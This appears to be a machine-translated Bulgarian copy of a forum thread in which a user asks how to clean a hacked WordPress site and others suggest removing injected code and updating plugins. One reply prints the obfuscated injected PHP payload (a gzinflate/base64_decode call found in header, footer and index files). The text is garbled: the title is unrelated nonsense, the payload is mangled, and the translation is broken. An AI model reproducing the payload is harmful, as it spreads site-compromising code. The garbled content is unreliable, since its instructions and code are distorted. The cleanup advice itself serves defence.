Penguinz0 Лицемерие персонализирано (памук Tho)

Здравейте, приятели, сайтът ми за wordpress беше инжектиран и сега трябва да го реша.

тук е моят домейн,

http://webstutorial.com/

Какво трябва да направя, моля, помогнете ми.

Това не е спам или техника за изграждане на връзки

Провери своя main.php заглавката на файла и долния колонтитул за злонамерен код и го премахнете, това е заразеният файл. Актуализирайте thumb.php от Timthumb и проверете и вашите index.php файлове за злонамерен код.

След като премахнете зловредния код от main.php и сте проверили index.php, потърсете във всичките си файлове зловредния код, след като почистите актуализирайте WordPress до най-новата версия, актуализирайте шаблона си и актуализирайте всички приставки.

  • когато си проверих index.php файл намерих този код # 215d25 # Ехо (gzinflate (base64_decode ( "TYxBDoMwDMC + UvU + Iu04AX8JJerataRLUjZ + PyQuu9qyRw2Smjk7Gk3e6GuQcceLeldwix3jqf6pSpj806w9AD60qHVjSViGwBVgpcogHF53SPVsFfK7kxw34xgLDVm9m0e4ZvMP"))); # / 215d25 #
  • Премахнете това от вашия индексен файл, след което потърсете всичките си файлове base64_decode но премахнете повече функции само ако са абсолютно еднакви, защото base64 кодирането е нормално. Тази функция обаче е злонамерена.
  • Намерих този код в header.php, footer.php и в index.php файлове, които премахнах от там и сега търся в други файлове
  • Avast вече не открива злонамерения софтуер, но chrome е, ще трябва да изчакате Google да обходи повторно вашия сайт и да актуализира индекса им с чиста версия. Ако това е било полезно, моля, отбележете това като отговор.
  • 1 @ Nick, може да искате да прочетете и моя отговор за осигуряването на wordpress. Следвайки описаните там стъпки, трябва да ви предпази от хакване в бъдеще.

е работил за вас: Charles Robertson | Искате ли да се свържете с нас?